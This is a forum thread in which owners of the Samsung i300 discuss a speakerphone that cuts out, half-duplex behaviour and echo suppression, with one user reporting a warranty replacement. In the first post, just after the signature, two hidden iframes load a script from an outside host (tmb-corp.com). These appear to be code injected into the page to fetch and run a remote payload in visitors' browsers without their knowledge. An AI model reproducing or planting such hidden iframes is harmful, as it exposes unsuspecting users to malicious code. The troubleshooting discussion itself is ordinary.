+ Reply to Thread

Problems with speaker phone

Is anyone having any problems with their speakerphone? It seems that on my unit the micophone cuts in and out. When i turn the speaker off and then on the problem goes aways for three or four minutes then returns. It also happends when i switch to Palm mode while on a call. Any help would be great.

jon<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Lightbulb Too much background noise -- perhaps

The speaker phone function has difficulty when there is background noice. In switches back and forth from listening for your voice and playing the voice of the other party. Background noise will cut off the other person. Using the palm function -- the phone may be picking up your pen strokes.

Mine works fine speaker phone mode. Keep background noise to a minimum and think of it as a walkie talkie. Both parties can not speak at the same time.

Enjoy,
    Tom

I am having a similar problem with my speaker phone. People complain about severe break up when I speak even though I can hear them clearly. If I go back to standard phone mode there is no problem.

The speaker phone is not like a walkie talkie. It is the same as when used in regular phone mode. One person's speech does not cut off the other. There is a different problem somewhere.

Any ideas anyone?

The speaker phone is the speaker phone and at this point, nothing can be done to improve its performance. I would really like for mine to function better. It doesn't matter whether I'm in my office or in the Loop, I am always told it is extremely choppy.

In that its not the best in the world, I tend to use it primarily when on hold or checking messages, or certainly when checking my datebook while talking. Its not a staple of the phone, just a necessary option should you need to look something up while talking.

Administrator

Arrow

Originally posted by stevebtn
    I am having a similar problem with my speaker phone. People complain about severe break up when I speak even though I can hear them clearly. If I go back to standard phone mode there is no problem.

The speaker phone is not like a walkie talkie. It is the same as when used in regular phone mode. One person's speech does not cut off the other. There is a different problem somewhere.

Any ideas anyone?
    this is because your speakerphone is loud that the mic picks up the sound and cuts your X-mission off. this prevents the person on the other end from having an echo.

try lowering the volume and that will help out. i occasionaly have this problem as well. i think the speakerphone mode is pretty good.

I disagree Marc. I stand firmly behing the I300 and its occassional blunder, and I feel this is one. Once again I don't feel the aim was to make the speaker phone a staple of the device as with Nextel, but though I hear just as well with speaker on as with off, the other person doesn't hear at all. Nomatter what level I have the speaker set upon, I can't speak until they are through speaking and vice versa.

Administrator

Arrow

sorry to hear you dont have beter success with the speaker. while not in speakermode, both parties can talk freely without cutting one or the other off, but in hands free, this may happen as to avoid echo.

as i said, i do have the occasional chopped up conversation, but now that i am using the sony, thats becoming less of a issue for me...

Originally posted by Marctronixx
    sorry to hear you dont have beter success with the speaker. while not in speakermode, both parties can talk freely without cutting one or the other off, but in hands free, this may happen as to avoid echo.

as i said, i do have the occasional chopped up conversation, but now that i am using the sony, thats becoming less of a issue for me...
    There you go again, Marcy Marc! Throwing the Sony in my face again!

Hey, give me a link for the Sony again?

Craig

I think the i300 has a pretty good speakerphone. My only gripe, and this is one of my biggest problems with this phone... WE NEED A HARD BUTTON FOR THE SPEAKERPHONE! SAMSUNG, ARE YOU LISTENING??? I REPEAT, WE NEED A HARD BUTTON FOR THE SPEAKERPHONE!:o

Originally posted by mjorange
    In that its not the best in the world, I tend to use it primarily when on hold or checking messages, or certainly when checking my datebook while talking. Its not a staple of the phone, just a necessary option should you need to look something up while talking.
    This is exactly how I use my speaker, but I have not been told the performance is bad. The Kyo 6035 had a really lousy speaker phone, so I am please with this one. Actually the one on the TP3000 was the BEST I have ever heard on a cell phone.
    Carl

Angry

I've done a search on speakerphone and some people swear by it that it is a great duplex speakerphone. I get mixed results, sometimes it's great and other times people tell me I'm breaking up. When I switch back to normal phone mode it's fine. It's not background noise being in quiet room and the volume is on it's lowest level. Anyone think they've nailed this one down yet?

I have I think the newest s/w version
    S:I300.01.S.UJ12
    P:SPRL 10014
    H:I300.03.S.Q.O

I'd love to get this speakerphone working consistently.

Gadget you're not alone. I've tried the speaker phone on 3 I300's and everyone suffers from the concerns you've addressed.

Administrator

Arrow

I've done a search on speakerphone and some people swear by it that it is a great duplex speakerphone. I get mixed results, sometimes it's great and other times people tell me I'm breaking up.
    thats just it! mixed results..

this is comon for all the early i300s (not sure about the newer versions, though i doubt it will be any different). the speaker does cut out the X-mission of your voice somewhat. i have had this happen and turning the volume down sometimes help.

however, i am using my headset now more so than before and dont worry about the speaker much.

Question Speakerphone

Has anyone elese noticed this:

When you are using the speakerphone, if the other party is talking, they can't hear you talk. I was wondering if the speakerphone is not full duplex. I had a touchpoint that had a half duplex speakerphone, but I thought the new phones had moved past that. It's really agrivating to not be able to cut people off when they ramble on the speakerphone.

Let me know if you guys noticed that.
    Thanks

Post motorola

About your speaker problem. mine had been doing the same thing for the past few weeks. I called 1 866 246 4852. thats cingulars warranty line. They ran a few checks on my phone and it still didnt work right. They are sending me a new phone free of charge.